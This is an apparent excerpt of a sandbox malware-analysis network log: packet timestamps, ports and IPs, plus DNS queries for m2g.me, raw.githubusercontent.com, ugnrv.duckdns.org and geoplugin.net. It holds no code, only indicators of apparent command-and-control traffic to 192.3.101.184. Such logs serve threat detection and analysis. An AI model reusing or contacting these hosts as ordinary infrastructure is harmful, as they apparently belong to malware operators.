                                                                                                                                                                    Oct 7, 2024 14:53:19.259224892 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259237051 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259247065 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259257078 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259267092 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259279013 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259280920 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259289026 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259300947 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259305954 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259311914 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259326935 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259347916 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259349108 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259361029 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259397984 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259408951 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259419918 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259429932 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259457111 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259480000 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259542942 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259552956 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259562016 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259567976 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259577036 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259588003 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259607077 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259648085 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259711027 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259721041 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259731054 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259742022 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259752035 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259762049 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259772062 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259773016 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259812117 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259812117 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259888887 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259900093 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259910107 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259919882 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259929895 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259934902 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259942055 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259943962 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259955883 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.259965897 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.259996891 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260062933 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260073900 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260083914 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260093927 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260117054 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260149002 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260195017 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260205030 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260215044 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260225058 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260234118 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260246038 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260243893 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260257959 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260267019 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260270119 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260281086 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260287046 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260293007 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260319948 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260441065 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260452032 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260462999 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260488987 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260528088 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260539055 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260549068 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260560036 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260572910 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260596991 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260603905 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260615110 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260623932 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260632992 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260651112 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260677099 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260684013 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260694981 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260704994 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260715008 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260725021 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260742903 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260742903 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.260843992 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260854959 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.260893106 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.261925936 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.296911955 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.296941996 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.296993017 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.297008038 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.297029972 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.297064066 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.297076941 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.297100067 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.297136068 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.297146082 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.297168970 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.297254086 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.344769001 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.344825029 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.344861984 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.344885111 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.344913006 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.344944954 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.344966888 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.344979048 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345014095 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345031977 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.345066071 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345099926 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345114946 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.345134974 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345180035 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.345268011 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345283031 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345297098 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345319986 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345323086 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.345333099 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345343113 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345351934 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345359087 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.345362902 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345379114 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.345379114 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345391035 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345400095 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345402956 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.345411062 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345424891 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345429897 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.345437050 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345448017 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345449924 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.345458031 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345473051 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345479012 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.345484972 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.345499039 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.345525980 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.347625017 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.766395092 CEST8049179178.237.33.50192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.766460896 CEST4917980192.168.2.22178.237.33.50
                                                                                                                                                                    Oct 7, 2024 14:53:24.645899057 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:24.650945902 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.651021004 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:24.651066065 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.651129007 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:24.655880928 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.655965090 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.655973911 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:24.655976057 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.656044960 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:24.656124115 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.656188965 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:24.660856962 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.660880089 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.660890102 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.660938978 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.660943031 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.660970926 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:24.661043882 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.661053896 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.661062956 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.661876917 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:24.665865898 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.665877104 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.665958881 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.666965008 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:24.667035103 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:33.385138035 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:33.386713982 CEST491779674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:33.391582012 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:54:03.319457054 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:54:03.320863962 CEST491779674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:54:03.325768948 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:54:24.378401041 CEST4917980192.168.2.22178.237.33.50
                                                                                                                                                                    Oct 7, 2024 14:54:24.689949989 CEST4917980192.168.2.22178.237.33.50
                                                                                                                                                                    Oct 7, 2024 14:54:25.298439026 CEST4917980192.168.2.22178.237.33.50
                                                                                                                                                                    Oct 7, 2024 14:54:26.593123913 CEST4917980192.168.2.22178.237.33.50
                                                                                                                                                                    Oct 7, 2024 14:54:28.995529890 CEST4917980192.168.2.22178.237.33.50
                                                                                                                                                                    Oct 7, 2024 14:54:33.366461992 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Oct 7, 2024 14:52:44.017083883 CEST5456253192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:52:44.029671907 CEST53545628.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.885768890 CEST5291753192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:52:47.895734072 CEST53529178.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:50.188801050 CEST6275153192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:52:50.201705933 CEST53627518.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:50.203603983 CEST5789353192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:52:50.210946083 CEST53578938.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:55.122936964 CEST5482153192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:52:55.133589029 CEST53548218.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:55.134922981 CEST5471953192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:52:55.143656969 CEST53547198.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:56.990550995 CEST4988153192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:52:56.998209953 CEST53498818.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:56.999419928 CEST5499853192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:52:57.007514954 CEST53549988.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.871608019 CEST5278153192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:52:58.879996061 CEST53527818.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.881477118 CEST6392653192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:52:58.890768051 CEST53639268.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:09.786370039 CEST6551053192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:53:09.795751095 CEST53655108.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:09.815882921 CEST6267253192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:53:09.824763060 CEST53626728.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:10.287966013 CEST5647553192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:53:10.295070887 CEST53564758.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:11.831300974 CEST4938453192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:53:11.841458082 CEST53493848.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:11.842632055 CEST5484253192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:53:11.849895000 CEST53548428.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.784921885 CEST5810553192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:53:16.881515980 CEST53581058.8.8.8192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.143843889 CEST6492853192.168.2.228.8.8.8
                                                                                                                                                                    Oct 7, 2024 14:53:18.153951883 CEST53649288.8.8.8192.168.2.22
                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Oct 7, 2024 14:52:44.017083883 CEST192.168.2.228.8.8.80xe88Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:47.885768890 CEST192.168.2.228.8.8.80x5fe4Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:50.188801050 CEST192.168.2.228.8.8.80x5d02Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:50.203603983 CEST192.168.2.228.8.8.80xc9cfStandard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:55.122936964 CEST192.168.2.228.8.8.80xc083Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:55.134922981 CEST192.168.2.228.8.8.80x1100Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:56.990550995 CEST192.168.2.228.8.8.80xb6ecStandard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:56.999419928 CEST192.168.2.228.8.8.80xd97eStandard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:58.871608019 CEST192.168.2.228.8.8.80x9c5bStandard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:58.881477118 CEST192.168.2.228.8.8.80x4189Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:09.786370039 CEST192.168.2.228.8.8.80x2383Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:09.815882921 CEST192.168.2.228.8.8.80x99e0Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:10.287966013 CEST192.168.2.228.8.8.80x72e6Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:11.831300974 CEST192.168.2.228.8.8.80x98abStandard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:11.842632055 CEST192.168.2.228.8.8.80x9b37Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:16.784921885 CEST192.168.2.228.8.8.80x6f1bStandard query (0)ugnrv.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:18.143843889 CEST192.168.2.228.8.8.80x38a8Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Oct 7, 2024 14:52:44.029671907 CEST8.8.8.8192.168.2.220xe88No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:47.895734072 CEST8.8.8.8192.168.2.220x5fe4No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:50.201705933 CEST8.8.8.8192.168.2.220x5d02No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:50.210946083 CEST8.8.8.8192.168.2.220xc9cfNo error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:55.133589029 CEST8.8.8.8192.168.2.220xc083No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:55.143656969 CEST8.8.8.8192.168.2.220x1100No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:56.998209953 CEST8.8.8.8192.168.2.220xb6ecNo error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:57.007514954 CEST8.8.8.8192.168.2.220xd97eNo error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:58.879996061 CEST8.8.8.8192.168.2.220x9c5bNo error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:52:58.890768051 CEST8.8.8.8192.168.2.220x4189No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:09.795751095 CEST8.8.8.8192.168.2.220x2383No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:09.824763060 CEST8.8.8.8192.168.2.220x99e0No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:10.295070887 CEST8.8.8.8192.168.2.220x72e6No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:10.295070887 CEST8.8.8.8192.168.2.220x72e6No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:10.295070887 CEST8.8.8.8192.168.2.220x72e6No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:10.295070887 CEST8.8.8.8192.168.2.220x72e6No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:11.841458082 CEST8.8.8.8192.168.2.220x98abNo error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:11.849895000 CEST8.8.8.8192.168.2.220x9b37No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Oct 7, 2024 14:53:16.881515980 CEST8.8.8.8192.168.2.220x6f1bNo error (0)ugnrv.duckdns.org192.3.101.184A (IP address)IN (0x0001)false
